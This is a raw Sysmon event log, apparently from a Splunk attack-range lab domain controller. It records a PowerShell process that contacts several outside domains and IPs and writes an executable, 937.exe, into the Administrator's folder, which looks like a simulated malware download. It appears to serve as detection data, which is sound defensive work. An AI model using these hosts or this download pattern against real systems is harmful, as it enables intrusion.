Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8E61A2ABC799596D336365ACA560B69,SHA256=9E81D9B9AF819AE7869746FDF24AA22E89C39987987A24DBE658E68068EA3139,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200832Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:32.087{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D1B62D57E4E9E1AC2CAF3531E947776,SHA256=E660CAAA156562FC8C7709D60C651D8CD58A253CE97FBAA0FF949F2BCA9B94D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200834Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:33.102{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38A574BDC293A0FE07C595101BD19625,SHA256=117091622EB8C0AA193B4EC960247DD37B71C92021834DC9656932B8B528A5CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200836Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:34.696{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=455B006D4F2672C2B75BBD995DF8B2D6,SHA256=ACA309460DF27C16A7BE18B519EC959A80D81D0F9B420455ABE006BCA02CB083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200835Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:34.118{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1403289AD4F62B8F34AE5C49008CC73,SHA256=DD91263B6ED71A07566EA6706FF9C04E7B94D6BC7325D11ACCAACE710C11647F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200838Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:31.486{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local61564- 23542300x80000000000000002200837Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:35.133{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD604D2340C089C23C86FB9277A25868,SHA256=BC924B302AE01BE0EC608CFC30A119BA2C27B03FE4E4A8A2EF8995BFA3AA1C5E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200841Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:32.501{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61564- 23542300x80000000000000002200840Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:36.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69F274F9B60814A2FDDE9D1C76E6292F,SHA256=94F415E600E24438E71A3C19DEDF4A8229F5B68C27B42604D7DFCA47FEEDD3E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200839Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:36.149{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E955ABB7F5BC37FAC1DB7DD0CBB289F,SHA256=7DFA78B011477AD6476E4FDB545775DAA9464366FA1086D9DD90F87946157E2B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200843Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:33.049{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55159-false10.0.1.12-8000- 23542300x80000000000000002200842Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:37.180{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF396E297A70858B7FC52906D4A5FE70,SHA256=6BCCA22DB0BEAA7DDCAB60147F9425B0A1623956D83947589985695143C27CB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200845Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:38.712{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB759BB6BB5D1EBD07F9D88550C8E81D,SHA256=667584547D708E4B913BEE321989F0BC49577B47A2699D1290A24D596FE3846D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200844Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:38.196{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F348EC508956D8DDA8E3A87DACF0CA9,SHA256=21D0F080AD9C53EB36E90B0E40D5755237D166399CE51531F53CFB48F87BFBB5,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002200847Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localEXE2021-03-04 13:55:39.712{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\937.exe2021-03-04 13:55:39.712 23542300x80000000000000002200846Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:39.196{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BC32FDDD87516F93D88BC606B66ED3A,SHA256=09ADCEF14E64305B68E75F920FF48E3F89CAC2924059B622D55CB934EA029D39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200850Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:40.743{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=30B8DC05AE7C2ABF2EFD0D6297246609,SHA256=E397BABFDD0A2BEC1B0B86EF972C08ED97A19764FDE76FEDFD0E502021CA4A06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200849Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:40.727{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0390D5B940AC1CCA5294705013F9453C,SHA256=786839D669C2A62E96CC5BFC6B72098B6953B9FD36BBFA5866D0E0C27A8293C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200848Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:40.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97DFD8AD7B739255E8DBDF9DF366E5E4,SHA256=984A5CAD9C44B96C38C36EBD47007F66C42D5B96293BE678905C53A1787017EA,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002200856Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:37.651{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ahc.mrbdev.com0::ffff:144.217.17.17;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x80000000000000002200855Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localEXE2021-03-04 13:55:41.696{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\937.exe2021-03-04 13:55:39.712 354300x80000000000000002200854Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:37.705{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-228.attackrange.local55160-false144.217.17.17-80http 354300x80000000000000002200853Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:37.553{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local62605- 23542300x80000000000000002200852Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:41.243{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1560350C346B12DC811BC62854BE5EA,SHA256=B4231DABBD0180D635F2F11C3DDF289F84C9724A91891895A21DD15D1AAE0B44,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002200851Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localEXE2021-03-04 13:55:41.133{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\937.exe2021-03-04 13:55:39.712 11241100x80000000000000002200863Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localEXE2021-03-04 13:55:42.977{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\937.exe2021-03-04 13:55:39.712 22542200x80000000000000002200862Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:39.646{5ABCFE62-D502-6040-CD4B-00000000AD01}6732magnificentpakistan.com0::ffff:204.11.56.48;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x80000000000000002200861Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:39.167{5ABCFE62-D502-6040-CD4B-00000000AD01}6732e-twow.be0::ffff:89.39.246.14;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000002200860Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:38.985{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local59746- 354300x80000000000000002200859Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:38.908{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55161-false10.0.1.12-8000- 23542300x80000000000000002200858Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:42.258{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E6780F89F95A47A2C03C99C7AE00634,SHA256=42F5B1FC4B40E8668BCBEABEA29F85583EA3D1EB544D63E1F24D43444BFE1A38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200857Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:42.180{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B57BE135C2DB3988B0F58D23FB6AD3C9,SHA256=8A3DB5B5A51448E514DDF31284C167CF208DA19D1B46FD1E426F9F187BD9AEE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200869Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:43.993{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A6A5219A44635BF1CF22483DF35207A,SHA256=392C5A91FCAC699FD3DEF4B00D319EEF1A84319BBD0028829D818EA092626255,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200868Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:39.544{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local58312- 354300x80000000000000002200867Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:39.486{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local58780- 354300x80000000000000002200866Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:39.345{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-228.attackrange.local55162-false89.39.246.14-80http 23542300x80000000000000002200865Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:43.290{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=108574448BA7E8B095BCF5079F3384B5,SHA256=88E77544C74F8002EB8AB63773671C9983908E3FB4212FEF27ADB5868ECF5963,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002200864Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localEXE2021-03-04 13:55:43.071{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\937.exe2021-03-04 13:55:39.712 11241100x80000000000000002200872Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localEXE2021-03-04 13:55:44.946{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\937.exe2021-03-04 13:55:39.712 23542300x80000000000000002200871Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:44.946{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\937.exeMD5=D89B04BBB20974A5597617E087D0502A,SHA256=972B9701E7AE8791F4BAD907B5D4C52920BA56C3A3CC8676840B64C7A329471F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200870Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:44.305{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9EFF71D1FDCDE2AD17C9EDC84A8BE03,SHA256=4E46594A9F7A1F5B9A5B03C83F4098733D20A835FB1C5E7121D9CD72DEDB6E93,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200882Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:41.549{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local62609- 354300x80000000000000002200881Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:41.145{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-228.attackrange.local55165-false103.253.212.191-80http 23542300x80000000000000002200880Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:45.790{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08C26AAB176BD3F8E6C7DA0E8A886FC3,SHA256=ECFD5469A4F4AF4C25BF5FDCD5551BB46E30370E0C874D4C395A139064DB49DF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002200879Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localEXE2021-03-04 13:55:45.743{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\937.exe2021-03-04 13:55:39.712 23542300x80000000000000002200878Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:45.321{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B35259C5636BEE1FF312733A65BC2B0E,SHA256=0AD5BAC8797BD212C9AC15E44E07CE77F11D2A7EA2EDC6E413ADAEA23BA4B5FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200877Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:45.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D20B813739031999CCF880E1FCB5094E,SHA256=2921AA963C65899B31956BE6A41AF882C210021FA3B097A8F197A47677E8537C,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002200876Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:40.909{5ABCFE62-D502-6040-CD4B-00000000AD01}6732www.qwqoo.com0type: 5 qwqoo.github.io;::ffff:185.199.110.153;::ffff:185.199.111.153;::ffff:185.199.108.153;::ffff:185.199.109.153;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000002200875Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:40.914{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local62206- 354300x80000000000000002200874Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:40.903{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-228.attackrange.local55164-false185.199.110.153cdn-185-199-110-153.github.com443https 354300x80000000000000002200873Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:40.828{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53766- 354300x80000000000000002200887Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:42.611{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local58181- 23542300x80000000000000002200886Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:46.805{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D584BC32A7699F583E851A54A2002A1B,SHA256=06057C31F1593E52BD6639C737A662BAF2C4BA67A008BDBB56E7941FD241DE8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200885Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:46.337{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB86EC676F045BE55F3509963B089FC9,SHA256=4A76A336437EA32FAABEE82C17A16C46295F120C3856B7FDC7DE3C6493C79455,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002200884Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localEXE2021-03-04 13:55:46.133{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\937.exe2021-03-04 13:55:39.712 22542200x80000000000000002200883Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:40.977{5ABCFE62-D502-6040-CD4B-00000000AD01}6732siwakuposo.com0::ffff:103.253.212.191;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000002200893Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:43.924{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55167-false10.0.1.12-8000- 354300x80000000000000002200892Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:43.780{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-228.attackrange.local55166-false89.39.246.14-80http 354300x80000000000000002200891Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:43.627{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local54129- 11241100x80000000000000002200890Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localEXE2021-03-04 13:55:47.352{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\937.exe2021-03-04 13:55:39.712 23542300x80000000000000002200889Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:47.337{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88536BFB0891440A027AFB09CF2AF51B,SHA256=F7573CFF53C8B80465458125172E81A00003A9D42E4258EF45E7BB1A24704E72,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002200888Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localEXE2021-03-04 13:55:47.321{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\937.exe2021-03-04 13:55:39.712 354300x80000000000000002200897Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:45.180{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-228.attackrange.local55169-false185.199.110.153cdn-185-199-110-153.github.com443https 23542300x80000000000000002200896Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:48.712{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7AF3BF5B70256A5F3B6FE1F99562F276,SHA256=850867F5C4E85FFBC1091DA0818A982A5A610944842584C4C79A4785B9DC8115,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200895Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:48.368{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4AB46F4637830F4D0FCEBCEDB6717EF,SHA256=EF16E56DCBA02F7140195F7A8A608D30AD6A17BB2CC6AAAF9DD292A20A8BDA46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200894Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 